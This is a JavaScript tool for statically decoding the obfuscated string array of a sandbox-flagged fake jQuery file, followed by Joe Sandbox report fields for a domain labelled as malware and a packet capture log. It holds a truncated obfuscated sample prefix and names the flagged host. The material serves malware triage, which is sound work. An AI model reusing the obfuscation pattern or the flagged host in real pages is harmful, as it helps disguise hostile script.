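// Added example (not part of the Joe Sandbox report or of the sample itself):
// statically decode the hex-escaped string array at the head of the downloaded
// jquery-3.6.0.min.js without ever evaluating the sample.

// Constructed input: the visible prefix from the report's Preview. The last
// element is truncated in the report and is closed here as-is, not completed.
const SAMPLE_SOURCE = String.raw`var _0x5c71=["\x63\x38\x32\x32\x63\x31\x62\x36\x33\x38\x35\x33\x65\x64\x32\x37\x33\x62\x38\x39\x36\x38\x37\x61\x63\x35\x30\x35\x66\x39\x66\x61","\x37\x33\x38\x61\x61\x38\x64\x33\x62\x63\x30\x32\x65\x62\x38\x37\x31\x32\x61\x63\x64\x30\x65\x62\x32\x63\x66\x36\x64\x66\x64\x35","\x32\x34\x31\x66\x65\x38\x61\x66\x31\x65\x30\x33\x38\x31\x31\x38\x63\x64\x38\x31\x37\x30\x34\x38\x61\x36\x35\x66\x38\x30\x33\x65","\x62\x61\x39\x62\x66\x30\x35\x36\x39\x33\x62\x39\x66\x61\x32\x30\x32\x64\x39\x32\x32\x64\x64\x34\x33\x61\x30\x38\x66\x32\x38\x31","\x72\x61\x6E\x64\x6F\x6D","\x6C\x65\x6E\x67\x74\x68","\x66\x6C\x6F\x6F\x72","\x64\x69\x76","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x69\x64","\x63\x73\x73\x54\x65\x78\x74","\x73\x74\x79\x6C\x65","\x77\x69\x64\x74\x68\x3A\x31\x30\x30\x25\x3B\x20\x68\x65\x69\x67\x68\x74\x3A\x31\x30\x30\x25\x3B\x20\x70\x6F\x73\x69\x74\x69\x6F\x6E\x3A\x66\x69\x78\x65\x64\x3B\x20\x6C\x65\x66\x74\x3A\x30\x70\x78\x3B\x20\x74\x6F\x70\x3A\x30\x70\x78\x3B\x20\x7A\x2D"];`;

// Expand \xHH, \uHHHH and the single-character escapes an obfuscator emits.
function decodeEscapes(s) {
  const simple = { n: '\n', r: '\r', t: '\t', b: '\b', f: '\f', v: '\v', '0': '\0' };
  return s.replace(/\\x([0-9A-Fa-f]{2})|\\u([0-9A-Fa-f]{4})|\\([\s\S])/g, (m, x, u, c) => {
    if (x !== undefined) return String.fromCharCode(parseInt(x, 16));
    if (u !== undefined) return String.fromCharCode(parseInt(u, 16));
    return Object.prototype.hasOwnProperty.call(simple, c) ? simple[c] : c; // \" \\ \/ map to themselves
  });
}

// Locate every `var _0x....=[` literal and return its decoded elements keyed by
// name. Element boundaries come from the quoted literals (sticky regex), so no
// part of the sample is executed.
function extractStringArrays(src) {
  const arrays = {};
  const headRe = /var\s+(_0x[0-9a-fA-F]+)\s*=\s*\[/g;
  const strRe = /"((?:[^"\\]|\\[\s\S])*)"|'((?:[^'\\]|\\[\s\S])*)'/y;
  let head;
  while ((head = headRe.exec(src)) !== null) {
    const elems = [];
    let pos = headRe.lastIndex;
    for (;;) {
      while (pos < src.length && /[\s,]/.test(src[pos])) pos++; // skip separators
      if (pos >= src.length || src[pos] === ']') break;          // end of array
      strRe.lastIndex = pos;
      const m = strRe.exec(src);
      if (!m) break;                                              // non-string element: stop here
      elems.push(decodeEscapes(m[1] !== undefined ? m[1] : m[2]));
      pos = strRe.lastIndex;
    }
    arrays[head[1]] = elems;
  }
  return arrays;
}

// Bucket the recovered strings the way a triager reads them: MD5-sized hex
// blobs, DOM/CSS API names, and inline CSS rules.
function triage(strings) {
  const hexBlobs = strings.filter(s => /^[0-9a-f]{32}$/.test(s));
  const domApi = strings.filter(s =>
    /^(createElement|getElementById|getElementsByTagName|appendChild|insertBefore|setAttribute|cssText|style|innerHTML|addEventListener|body|head|div|iframe|script)$/.test(s));
  const cssRules = strings.filter(s => /^[a-z-]+:[^;]+;/.test(s));
  return { hexBlobs, domApi, cssRules };
}

// Decode the constructed sample's _0x5c71 array.
function decodeSample() {
  return extractStringArrays(SAMPLE_SOURCE)._0x5c71;
}

if (typeof require !== 'undefined' && require.main === module) {
  const decoded = decodeSample();
  decoded.forEach((s, i) => console.log(`_0x5c71[${i}] = ${JSON.stringify(s)}`));
  console.log(triage(decoded));
}
```

Run against the visible prefix, the array decodes to four 32-character lowercase hex values, the names `random`, `length`, `floor`, `div`, `createElement`, `id`, `cssText` and `style`, and a CSS rule for a full-viewport `position:fixed` element whose `z-` property is where the Preview is cut off. What the script does with those strings is not visible in the Preview, so the report's own verdict (Malicious: false for this file, malware label from Avira URL Cloud for the URL) is all the page supports.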
                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                      File Type:HTML document, ASCII text, with CRLF line terminators
                      Category:downloaded
                      Size (bytes):580
                      Entropy (8bit):4.8136327677200565
                      Encrypted:false
                      SSDEEP:12:TjeRHdHiHZdtklI5rPiCNGlTF5TF5TF5TF5TF5TFK:neRH988lTPTPTPTPTPTc
                      MD5:19BD47CCBB05E0D9EC3C0116300204D3
                      SHA1:495403F5ABA96F0A4451AD3871E0049153F8CD8A
                      SHA-256:9E3DAD9D075C73DC68D76BDFEE5A2400BB8DA07094C1059544B434177A8789F0
                      SHA-512:66BB2D5D37CD095ADF9DC6D33DBBF86B89B7149B4BCEC8BE7EC27014C536F436DCD142EFA96E3BB4C5C07570CC9D2D71F2D4669B1F7B8BDA183ED8EC0F2D1A9B
                      Malicious:false
                      Reputation:low
                      URL:https://abu.usaday.biz/favicon.ico
                      Preview:<html>..<head><title>404 Not Found</title></head>..<body bgcolor="white">..<center><h1>404 Not Found</h1></center>..<hr><center>nginx/1.10.3 (Ubuntu)</center>..</body>..</html>..<!-- a padding to disable MSIE and Chrome friendly error page -->..<!-- a padding to disable MSIE and Chrome friendly error page -->..<!-- a padding to disable MSIE and Chrome friendly error page -->..<!-- a padding to disable MSIE and Chrome friendly error page -->..<!-- a padding to disable MSIE and Chrome friendly error page -->..<!-- a padding to disable MSIE and Chrome friendly error page -->..
                      No static file info


                      • Total Packets: 160
                      • 443 (HTTPS)
                      • 80 (HTTP)
                      • 53 (DNS)
                      Timestamp | Source Port | Dest Port | Source IP | Dest IP
                      Oct 10, 2023 05:16:04.607671022 CEST | 49671 | 443 | 192.168.2.3 | 204.79.197.203
                      Oct 10, 2023 05:16:07.529481888 CEST | 49676 | 443 | 192.168.2.3 | 104.98.116.138
                      Oct 10, 2023 05:16:07.529603004 CEST | 49677 | 443 | 192.168.2.3 | 104.98.116.138
                      Oct 10, 2023 05:16:07.529613972 CEST | 49675 | 443 | 192.168.2.3 | 104.98.116.155
                      Oct 10, 2023 05:16:07.533260107 CEST | 49674 | 443 | 192.168.2.3 | 173.222.162.43
                      Oct 10, 2023 05:16:07.935857058 CEST | 49672 | 443 | 192.168.2.3 | 104.98.116.138
                      Oct 10, 2023 05:16:09.387603045 CEST | 49681 | 443 | 192.168.2.3 | 20.189.173.5
                      Oct 10, 2023 05:16:09.420186996 CEST | 49671 | 443 | 192.168.2.3 | 204.79.197.203
                      Oct 10, 2023 05:16:09.701385021 CEST | 49681 | 443 | 192.168.2.3 | 20.189.173.5
                      Oct 10, 2023 05:16:10.310745001 CEST | 49681 | 443 | 192.168.2.3 | 20.189.173.5
                      Oct 10, 2023 05:16:11.008964062 CEST | 49713 | 443 | 192.168.2.3 | 142.250.72.174
                      Oct 10, 2023 05:16:11.009043932 CEST | 443 | 49713 | 142.250.72.174 | 192.168.2.3
                      Oct 10, 2023 05:16:11.009135962 CEST | 49713 | 443 | 192.168.2.3 | 142.250.72.174
                      Oct 10, 2023 05:16:11.009923935 CEST | 49714 | 443 | 192.168.2.3 | 142.250.217.141
                      Oct 10, 2023 05:16:11.009988070 CEST | 443 | 49714 | 142.250.217.141 | 192.168.2.3
                      Oct 10, 2023 05:16:11.010052919 CEST | 49714 | 443 | 192.168.2.3 | 142.250.217.141
                      Oct 10, 2023 05:16:11.010270119 CEST | 49713 | 443 | 192.168.2.3 | 142.250.72.174
                      Oct 10, 2023 05:16:11.010301113 CEST | 443 | 49713 | 142.250.72.174 | 192.168.2.3
                      Oct 10, 2023 05:16:11.010468006 CEST | 49714 | 443 | 192.168.2.3 | 142.250.217.141
                      Oct 10, 2023 05:16:11.010500908 CEST | 443 | 49714 | 142.250.217.141 | 192.168.2.3
                      Oct 10, 2023 05:16:11.420255899 CEST | 443 | 49714 | 142.250.217.141 | 192.168.2.3
                      Oct 10, 2023 05:16:11.420350075 CEST | 443 | 49713 | 142.250.72.174 | 192.168.2.3
                      Oct 10, 2023 05:16:11.420519114 CEST | 49714 | 443 | 192.168.2.3 | 142.250.217.141
                      Oct 10, 2023 05:16:11.420563936 CEST | 443 | 49714 | 142.250.217.141 | 192.168.2.3
                      Oct 10, 2023 05:16:11.420644999 CEST | 49713 | 443 | 192.168.2.3 | 142.250.72.174
                      Oct 10, 2023 05:16:11.420670033 CEST | 443 | 49713 | 142.250.72.174 | 192.168.2.3
                      Oct 10, 2023 05:16:11.421189070 CEST | 443 | 49713 | 142.250.72.174 | 192.168.2.3
                      Oct 10, 2023 05:16:11.421257019 CEST | 49713 | 443 | 192.168.2.3 | 142.250.72.174
                      Oct 10, 2023 05:16:11.422481060 CEST | 443 | 49714 | 142.250.217.141 | 192.168.2.3
                      Oct 10, 2023 05:16:11.422488928 CEST | 443 | 49713 | 142.250.72.174 | 192.168.2.3
                      Oct 10, 2023 05:16:11.422564030 CEST | 49714 | 443 | 192.168.2.3 | 142.250.217.141
                      Oct 10, 2023 05:16:11.423753977 CEST | 49713 | 443 | 192.168.2.3 | 142.250.72.174
                      Oct 10, 2023 05:16:11.423753977 CEST | 49713 | 443 | 192.168.2.3 | 142.250.72.174
                      Oct 10, 2023 05:16:11.423830986 CEST | 443 | 49713 | 142.250.72.174 | 192.168.2.3
                      Oct 10, 2023 05:16:11.423999071 CEST | 49713 | 443 | 192.168.2.3 | 142.250.72.174
                      Oct 10, 2023 05:16:11.424005985 CEST | 443 | 49713 | 142.250.72.174 | 192.168.2.3
                      Oct 10, 2023 05:16:11.424314976 CEST | 49714 | 443 | 192.168.2.3 | 142.250.217.141
                      Oct 10, 2023 05:16:11.424401045 CEST | 443 | 49714 | 142.250.217.141 | 192.168.2.3
                      Oct 10, 2023 05:16:11.424477100 CEST | 49714 | 443 | 192.168.2.3 | 142.250.217.141
                      Oct 10, 2023 05:16:11.424491882 CEST | 443 | 49714 | 142.250.217.141 | 192.168.2.3
                      Oct 10, 2023 05:16:11.478318930 CEST | 49714 | 443 | 192.168.2.3 | 142.250.217.141
                      Oct 10, 2023 05:16:11.478451014 CEST | 49713 | 443 | 192.168.2.3 | 142.250.72.174
                      Oct 10, 2023 05:16:11.525217056 CEST | 49681 | 443 | 192.168.2.3 | 20.189.173.5
                      Oct 10, 2023 05:16:11.766113997 CEST | 443 | 49713 | 142.250.72.174 | 192.168.2.3
                      Oct 10, 2023 05:16:11.766561985 CEST | 443 | 49713 | 142.250.72.174 | 192.168.2.3
                      Oct 10, 2023 05:16:11.766644955 CEST | 49713 | 443 | 192.168.2.3 | 142.250.72.174
                      Oct 10, 2023 05:16:11.766906977 CEST | 49713 | 443 | 192.168.2.3 | 142.250.72.174
                      Oct 10, 2023 05:16:11.766946077 CEST | 443 | 49713 | 142.250.72.174 | 192.168.2.3
                      Oct 10, 2023 05:16:11.814753056 CEST | 443 | 49714 | 142.250.217.141 | 192.168.2.3
                      Oct 10, 2023 05:16:11.814831018 CEST | 49714 | 443 | 192.168.2.3 | 142.250.217.141
                      Oct 10, 2023 05:16:11.814893961 CEST | 443 | 49714 | 142.250.217.141 | 192.168.2.3
                      Oct 10, 2023 05:16:11.816134930 CEST | 443 | 49714 | 142.250.217.141 | 192.168.2.3
                      Oct 10, 2023 05:16:11.816216946 CEST | 49714 | 443 | 192.168.2.3 | 142.250.217.141
                      Oct 10, 2023 05:16:11.816313028 CEST | 49714 | 443 | 192.168.2.3 | 142.250.217.141
                      Oct 10, 2023 05:16:11.816343069 CEST | 443 | 49714 | 142.250.217.141 | 192.168.2.3
                      Oct 10, 2023 05:16:12.653964996 CEST | 49715 | 443 | 192.168.2.3 | 172.67.148.211
                      Oct 10, 2023 05:16:12.654057026 CEST | 443 | 49715 | 172.67.148.211 | 192.168.2.3
                      Oct 10, 2023 05:16:12.654150009 CEST | 49715 | 443 | 192.168.2.3 | 172.67.148.211
                      Oct 10, 2023 05:16:12.654505014 CEST | 49715 | 443 | 192.168.2.3 | 172.67.148.211
                      Oct 10, 2023 05:16:12.654541016 CEST | 443 | 49715 | 172.67.148.211 | 192.168.2.3
                      Oct 10, 2023 05:16:13.003983021 CEST | 443 | 49715 | 172.67.148.211 | 192.168.2.3
                      Oct 10, 2023 05:16:13.004307032 CEST | 49715 | 443 | 192.168.2.3 | 172.67.148.211
                      Oct 10, 2023 05:16:13.004339933 CEST | 443 | 49715 | 172.67.148.211 | 192.168.2.3
                      Oct 10, 2023 05:16:13.005387068 CEST | 443 | 49715 | 172.67.148.211 | 192.168.2.3
                      Oct 10, 2023 05:16:13.005465031 CEST | 49715 | 443 | 192.168.2.3 | 172.67.148.211
                      Oct 10, 2023 05:16:13.008788109 CEST | 49715 | 443 | 192.168.2.3 | 172.67.148.211
                      Oct 10, 2023 05:16:13.008860111 CEST | 443 | 49715 | 172.67.148.211 | 192.168.2.3
                      Oct 10, 2023 05:16:13.009388924 CEST | 49715 | 443 | 192.168.2.3 | 172.67.148.211
                      Oct 10, 2023 05:16:13.009407997 CEST | 443 | 49715 | 172.67.148.211 | 192.168.2.3
                      Oct 10, 2023 05:16:13.061278105 CEST | 49715 | 443 | 192.168.2.3 | 172.67.148.211
                      Oct 10, 2023 05:16:13.308012009 CEST | 443 | 49709 | 104.98.116.138 | 192.168.2.3
                      Oct 10, 2023 05:16:13.308264971 CEST | 49709 | 443 | 192.168.2.3 | 104.98.116.138
                      Oct 10, 2023 05:16:13.371685982 CEST | 443 | 49715 | 172.67.148.211 | 192.168.2.3
                      Oct 10, 2023 05:16:13.371714115 CEST | 443 | 49715 | 172.67.148.211 | 192.168.2.3
                      Oct 10, 2023 05:16:13.371911049 CEST | 49715 | 443 | 192.168.2.3 | 172.67.148.211
                      Oct 10, 2023 05:16:13.371932030 CEST | 443 | 49715 | 172.67.148.211 | 192.168.2.3
                      Oct 10, 2023 05:16:13.372118950 CEST | 49715 | 443 | 192.168.2.3 | 172.67.148.211
                      Oct 10, 2023 05:16:13.373002052 CEST | 49715 | 443 | 192.168.2.3 | 172.67.148.211
                      Oct 10, 2023 05:16:13.373044014 CEST | 443 | 49715 | 172.67.148.211 | 192.168.2.3
                      Oct 10, 2023 05:16:13.457556963 CEST | 49717 | 443 | 192.168.2.3 | 172.67.148.211
                      Oct 10, 2023 05:16:13.457626104 CEST | 443 | 49717 | 172.67.148.211 | 192.168.2.3
                      Oct 10, 2023 05:16:13.457704067 CEST | 49717 | 443 | 192.168.2.3 | 172.67.148.211
                      Oct 10, 2023 05:16:13.458046913 CEST | 49717 | 443 | 192.168.2.3 | 172.67.148.211
                      Oct 10, 2023 05:16:13.458081007 CEST | 443 | 49717 | 172.67.148.211 | 192.168.2.3
                      Oct 10, 2023 05:16:13.792773008 CEST | 443 | 49717 | 172.67.148.211 | 192.168.2.3
                      Oct 10, 2023 05:16:13.793138981 CEST | 49717 | 443 | 192.168.2.3 | 172.67.148.211
                      Oct 10, 2023 05:16:13.793167114 CEST | 443 | 49717 | 172.67.148.211 | 192.168.2.3
                      Oct 10, 2023 05:16:13.793487072 CEST | 443 | 49717 | 172.67.148.211 | 192.168.2.3
                      Oct 10, 2023 05:16:13.793895006 CEST | 49717 | 443 | 192.168.2.3 | 172.67.148.211
                      Oct 10, 2023 05:16:13.793955088 CEST | 443 | 49717 | 172.67.148.211 | 192.168.2.3
                      Oct 10, 2023 05:16:13.794154882 CEST | 49717 | 443 | 192.168.2.3 | 172.67.148.211
                      Oct 10, 2023 05:16:13.838460922 CEST | 443 | 49717 | 172.67.148.211 | 192.168.2.3
                      Oct 10, 2023 05:16:13.932147026 CEST | 49681 | 443 | 192.168.2.3 | 20.189.173.5
                      Oct 10, 2023 05:16:14.173526049 CEST | 443 | 49717 | 172.67.148.211 | 192.168.2.3
                      Oct 10, 2023 05:16:14.173639059 CEST | 443 | 49717 | 172.67.148.211 | 192.168.2.3
                      Oct 10, 2023 05:16:14.173712969 CEST | 49717 | 443 | 192.168.2.3 | 172.67.148.211
                      Oct 10, 2023 05:16:14.177268982 CEST | 49717 | 443 | 192.168.2.3 | 172.67.148.211
                      Oct 10, 2023 05:16:14.177318096 CEST | 443 | 49717 | 172.67.148.211 | 192.168.2.3
                      Oct 10, 2023 05:16:14.341728926 CEST | 49718 | 443 | 192.168.2.3 | 35.190.80.1
                      Oct 10, 2023 05:16:14.341789961 CEST | 443 | 49718 | 35.190.80.1 | 192.168.2.3
                      Oct 10, 2023 05:16:14.341866016 CEST | 49718 | 443 | 192.168.2.3 | 35.190.80.1
                      Oct 10, 2023 05:16:14.342349052 CEST | 49718 | 443 | 192.168.2.3 | 35.190.80.1
                      Oct 10, 2023 05:16:14.342365026 CEST | 443 | 49718 | 35.190.80.1 | 192.168.2.3
                      Oct 10, 2023 05:16:14.700180054 CEST | 443 | 49718 | 35.190.80.1 | 192.168.2.3
                      Oct 10, 2023 05:16:14.700494051 CEST | 49718 | 443 | 192.168.2.3 | 35.190.80.1
                      Oct 10, 2023 05:16:14.700527906 CEST | 443 | 49718 | 35.190.80.1 | 192.168.2.3
                      Oct 10, 2023 05:16:14.701702118 CEST | 443 | 49718 | 35.190.80.1 | 192.168.2.3
                      Oct 10, 2023 05:16:14.701864004 CEST | 49718 | 443 | 192.168.2.3 | 35.190.80.1
                      Oct 10, 2023 05:16:15.012866020 CEST | 49718 | 443 | 192.168.2.3 | 35.190.80.1
                      Oct 10, 2023 05:16:15.012950897 CEST | 49718 | 443 | 192.168.2.3 | 35.190.80.1
                      Oct 10, 2023 05:16:15.012981892 CEST | 443 | 49718 | 35.190.80.1 | 192.168.2.3
                      Oct 10, 2023 05:16:15.013183117 CEST | 443 | 49718 | 35.190.80.1 | 192.168.2.3
                      Oct 10, 2023 05:16:15.071748018 CEST | 49718 | 443 | 192.168.2.3 | 35.190.80.1
                      Oct 10, 2023 05:16:15.071780920 CEST | 443 | 49718 | 35.190.80.1 | 192.168.2.3
                      Oct 10, 2023 05:16:15.118438005 CEST | 49718 | 443 | 192.168.2.3 | 35.190.80.1
                      Oct 10, 2023 05:16:15.236120939 CEST | 443 | 49718 | 35.190.80.1 | 192.168.2.3
                      Oct 10, 2023 05:16:15.236203909 CEST | 443 | 49718 | 35.190.80.1 | 192.168.2.3
                      Oct 10, 2023 05:16:15.236387014 CEST | 49718 | 443 | 192.168.2.3 | 35.190.80.1
                      Oct 10, 2023 05:16:15.239609957 CEST | 49718 | 443 | 192.168.2.3 | 35.190.80.1
                      Oct 10, 2023 05:16:15.239655018 CEST | 443 | 49718 | 35.190.80.1 | 192.168.2.3
                      Oct 10, 2023 05:16:15.241127968 CEST | 49719 | 443 | 192.168.2.3 | 35.190.80.1
                      Oct 10, 2023 05:16:15.241214037 CEST | 443 | 49719 | 35.190.80.1 | 192.168.2.3
                      Oct 10, 2023 05:16:15.241307020 CEST | 49719 | 443 | 192.168.2.3 | 35.190.80.1
                      Oct 10, 2023 05:16:15.241863012 CEST | 49719 | 443 | 192.168.2.3 | 35.190.80.1
                      Oct 10, 2023 05:16:15.241894960 CEST | 443 | 49719 | 35.190.80.1 | 192.168.2.3
                      Oct 10, 2023 05:16:15.267874956 CEST | 49720 | 443 | 192.168.2.3 | 172.217.12.132
                      Oct 10, 2023 05:16:15.267955065 CEST | 443 | 49720 | 172.217.12.132 | 192.168.2.3
                      Oct 10, 2023 05:16:15.268038988 CEST | 49720 | 443 | 192.168.2.3 | 172.217.12.132
                      Oct 10, 2023 05:16:15.268537998 CEST | 49720 | 443 | 192.168.2.3 | 172.217.12.132
                      Oct 10, 2023 05:16:15.268573046 CEST | 443 | 49720 | 172.217.12.132 | 192.168.2.3
                      Oct 10, 2023 05:16:15.597950935 CEST | 443 | 49719 | 35.190.80.1 | 192.168.2.3
                      Oct 10, 2023 05:16:15.598472118 CEST | 49719 | 443 | 192.168.2.3 | 35.190.80.1
                      Oct 10, 2023 05:16:15.598534107 CEST | 443 | 49719 | 35.190.80.1 | 192.168.2.3
                      Oct 10, 2023 05:16:15.598954916 CEST | 443 | 49719 | 35.190.80.1 | 192.168.2.3
                      Oct 10, 2023 05:16:15.599683046 CEST | 49719 | 443 | 192.168.2.3 | 35.190.80.1
                      Oct 10, 2023 05:16:15.599752903 CEST | 443 | 49719 | 35.190.80.1 | 192.168.2.3
                      Oct 10, 2023 05:16:15.600034952 CEST | 49719 | 443 | 192.168.2.3 | 35.190.80.1
                      Oct 10, 2023 05:16:15.635339022 CEST | 443 | 49720 | 172.217.12.132 | 192.168.2.3
                      Oct 10, 2023 05:16:15.636082888 CEST | 49720 | 443 | 192.168.2.3 | 172.217.12.132
                      Oct 10, 2023 05:16:15.636126041 CEST | 443 | 49720 | 172.217.12.132 | 192.168.2.3
                      Oct 10, 2023 05:16:15.637833118 CEST | 443 | 49720 | 172.217.12.132 | 192.168.2.3
                      Oct 10, 2023 05:16:15.637937069 CEST | 49720 | 443 | 192.168.2.3 | 172.217.12.132
                      Oct 10, 2023 05:16:15.639473915 CEST | 49720 | 443 | 192.168.2.3 | 172.217.12.132
                      Oct 10, 2023 05:16:15.639573097 CEST | 443 | 49720 | 172.217.12.132 | 192.168.2.3
                      Oct 10, 2023 05:16:15.642469883 CEST | 443 | 49719 | 35.190.80.1 | 192.168.2.3
                      Oct 10, 2023 05:16:15.680943966 CEST | 49720 | 443 | 192.168.2.3 | 172.217.12.132
                      Oct 10, 2023 05:16:15.680963993 CEST | 443 | 49720 | 172.217.12.132 | 192.168.2.3
                      Oct 10, 2023 05:16:15.727826118 CEST | 49720 | 443 | 192.168.2.3 | 172.217.12.132
                      Oct 10, 2023 05:16:15.988507032 CEST | 443 | 49719 | 35.190.80.1 | 192.168.2.3
                      Oct 10, 2023 05:16:15.988614082 CEST | 443 | 49719 | 35.190.80.1 | 192.168.2.3
                      Oct 10, 2023 05:16:15.988913059 CEST | 49719 | 443 | 192.168.2.3 | 35.190.80.1
                      Oct 10, 2023 05:16:15.988914013 CEST | 49719 | 443 | 192.168.2.3 | 35.190.80.1
                      Oct 10, 2023 05:16:15.988914013 CEST | 49719 | 443 | 192.168.2.3 | 35.190.80.1
                      Oct 10, 2023 05:16:17.134116888 CEST | 49674 | 443 | 192.168.2.3 | 173.222.162.43
                      Oct 10, 2023 05:16:17.134171963 CEST | 49676 | 443 | 192.168.2.3 | 104.98.116.138
                      Oct 10, 2023 05:16:17.134179115 CEST | 49675 | 443 | 192.168.2.3 | 104.98.116.155
                      Oct 10, 2023 05:16:17.134210110 CEST | 49677 | 443 | 192.168.2.3 | 104.98.116.138
                      Oct 10, 2023 05:16:17.540744066 CEST | 49672 | 443 | 192.168.2.3 | 104.98.116.138
                      Oct 10, 2023 05:16:18.743846893 CEST | 49681 | 443 | 192.168.2.3 | 20.189.173.5
                      Oct 10, 2023 05:16:19.025278091 CEST | 49671 | 443 | 192.168.2.3 | 204.79.197.203
                      Oct 10, 2023 05:16:25.629079103 CEST | 443 | 49720 | 172.217.12.132 | 192.168.2.3
                      Oct 10, 2023 05:16:25.629265070 CEST | 443 | 49720 | 172.217.12.132 | 192.168.2.3
                      Oct 10, 2023 05:16:25.629405975 CEST | 49720 | 443 | 192.168.2.3 | 172.217.12.132
                      Oct 10, 2023 05:16:26.154649973 CEST | 49720 | 443 | 192.168.2.3 | 172.217.12.132
                      Oct 10, 2023 05:16:26.154719114 CEST | 443 | 49720 | 172.217.12.132 | 192.168.2.3
                      Oct 10, 2023 05:16:27.840143919 CEST | 49721 | 443 | 192.168.2.3 | 40.68.123.157
                      Oct 10, 2023 05:16:27.840178013 CEST | 443 | 49721 | 40.68.123.157 | 192.168.2.3
                      Oct 10, 2023 05:16:27.840274096 CEST | 49721 | 443 | 192.168.2.3 | 40.68.123.157
                      Oct 10, 2023 05:16:27.843182087 CEST | 49721 | 443 | 192.168.2.3 | 40.68.123.157
                      Oct 10, 2023 05:16:27.843190908 CEST | 443 | 49721 | 40.68.123.157 | 192.168.2.3
                      Oct 10, 2023 05:16:28.273758888 CEST | 49709 | 443 | 192.168.2.3 | 104.98.116.138
                      Oct 10, 2023 05:16:28.353467941 CEST | 49681 | 443 | 192.168.2.3 | 20.189.173.5
                      Oct 10, 2023 05:16:28.436680079 CEST | 443 | 49709 | 104.98.116.138 | 192.168.2.3
                      Oct 10, 2023 05:16:28.436989069 CEST | 443 | 49709 | 104.98.116.138 | 192.168.2.3
                      Oct 10, 2023 05:16:28.437091112 CEST | 49709 | 443 | 192.168.2.3 | 104.98.116.138
                      Oct 10, 2023 05:16:28.437093973 CEST | 443 | 49709 | 104.98.116.138 | 192.168.2.3
                      Oct 10, 2023 05:16:28.437149048 CEST | 49709 | 443 | 192.168.2.3 | 104.98.116.138
                      Oct 10, 2023 05:16:28.437222004 CEST | 443 | 49709 | 104.98.116.138 | 192.168.2.3
                      Oct 10, 2023 05:16:28.437278986 CEST | 49709 | 443 | 192.168.2.3 | 104.98.116.138
                      Oct 10, 2023 05:16:28.437284946 CEST | 443 | 49709 | 104.98.116.138 | 192.168.2.3
                      Oct 10, 2023 05:16:28.437638044 CEST | 49709 | 443 | 192.168.2.3 | 104.98.116.138
                      Oct 10, 2023 05:16:28.600338936 CEST | 443 | 49709 | 104.98.116.138 | 192.168.2.3
                      Oct 10, 2023 05:16:28.600392103 CEST | 443 | 49709 | 104.98.116.138 | 192.168.2.3
                      Oct 10, 2023 05:16:28.600452900 CEST | 49709 | 443 | 192.168.2.3 | 104.98.116.138
                      Oct 10, 2023 05:16:28.600487947 CEST | 49709 | 443 | 192.168.2.3 | 104.98.116.138
                      Oct 10, 2023 05:16:28.652381897 CEST | 49709 | 443 | 192.168.2.3 | 104.98.116.138
                      Oct 10, 2023 05:16:28.789794922 CEST | 443 | 49721 | 40.68.123.157 | 192.168.2.3
                      Oct 10, 2023 05:16:28.789899111 CEST | 49721 | 443 | 192.168.2.3 | 40.68.123.157
                      Oct 10, 2023 05:16:28.799215078 CEST | 49721 | 443 | 192.168.2.3 | 40.68.123.157
                      Oct 10, 2023 05:16:28.799228907 CEST | 443 | 49721 | 40.68.123.157 | 192.168.2.3
                      Oct 10, 2023 05:16:28.799742937 CEST | 443 | 49721 | 40.68.123.157 | 192.168.2.3
                      Oct 10, 2023 05:16:28.814735889 CEST | 443 | 49709 | 104.98.116.138 | 192.168.2.3
                      Oct 10, 2023 05:16:28.815145016 CEST | 443 | 49709 | 104.98.116.138 | 192.168.2.3
                      Oct 10, 2023 05:16:28.815212011 CEST | 49709 | 443 | 192.168.2.3 | 104.98.116.138
                      Oct 10, 2023 05:16:28.821551085 CEST | 49709 | 443 | 192.168.2.3 | 104.98.116.138
                      Oct 10, 2023 05:16:28.821625948 CEST | 49709 | 443 | 192.168.2.3 | 104.98.116.138
                      Oct 10, 2023 05:16:28.821851969 CEST | 49709 | 443 | 192.168.2.3 | 104.98.116.138
                      Oct 10, 2023 05:16:28.821921110 CEST | 49709 | 443 | 192.168.2.3 | 104.98.116.138
                      Oct 10, 2023 05:16:28.853382111 CEST | 49721 | 443 | 192.168.2.3 | 40.68.123.157
                      Oct 10, 2023 05:16:28.984286070 CEST | 443 | 49709 | 104.98.116.138 | 192.168.2.3
                      Oct 10, 2023 05:16:28.984306097 CEST | 443 | 49709 | 104.98.116.138 | 192.168.2.3
                      Oct 10, 2023 05:16:28.984321117 CEST | 443 | 49709 | 104.98.116.138 | 192.168.2.3
                      Oct 10, 2023 05:16:28.984337091 CEST | 443 | 49709 | 104.98.116.138 | 192.168.2.3
                      Oct 10, 2023 05:16:28.984391928 CEST | 49709 | 443 | 192.168.2.3 | 104.98.116.138
                      Oct 10, 2023 05:16:28.987073898 CEST | 443 | 49709 | 104.98.116.138 | 192.168.2.3
                      Oct 10, 2023 05:16:29.031547070 CEST | 49709 | 443 | 192.168.2.3 | 104.98.116.138
                      Oct 10, 2023 05:16:29.040139914 CEST | 49721 | 443 | 192.168.2.3 | 40.68.123.157
                      Oct 10, 2023 05:16:29.064541101 CEST | 443 | 49709 | 104.98.116.138 | 192.168.2.3
                      Oct 10, 2023 05:16:29.064591885 CEST | 443 | 49709 | 104.98.116.138 | 192.168.2.3
                      Oct 10, 2023 05:16:29.064646959 CEST | 49709 | 443 | 192.168.2.3 | 104.98.116.138
                      Oct 10, 2023 05:16:29.064668894 CEST | 49709 | 443 | 192.168.2.3 | 104.98.116.138
                      Oct 10, 2023 05:16:29.086481094 CEST | 443 | 49721 | 40.68.123.157 | 192.168.2.3
                      Oct 10, 2023 05:16:29.227343082 CEST | 443 | 49709 | 104.98.116.138 | 192.168.2.3
                      Oct 10, 2023 05:16:29.710170984 CEST | 443 | 49721 | 40.68.123.157 | 192.168.2.3
                      Oct 10, 2023 05:16:29.710225105 CEST | 443 | 49721 | 40.68.123.157 | 192.168.2.3
                      Oct 10, 2023 05:16:29.710244894 CEST | 443 | 49721 | 40.68.123.157 | 192.168.2.3
                      Oct 10, 2023 05:16:29.710261106 CEST | 443 | 49721 | 40.68.123.157 | 192.168.2.3
                      Oct 10, 2023 05:16:29.710297108 CEST | 49721 | 443 | 192.168.2.3 | 40.68.123.157
                      Oct 10, 2023 05:16:29.710318089 CEST | 443 | 49721 | 40.68.123.157 | 192.168.2.3
                      Oct 10, 2023 05:16:29.710336924 CEST | 443 | 49721 | 40.68.123.157 | 192.168.2.3
                      Oct 10, 2023 05:16:29.710342884 CEST | 49721 | 443 | 192.168.2.3 | 40.68.123.157
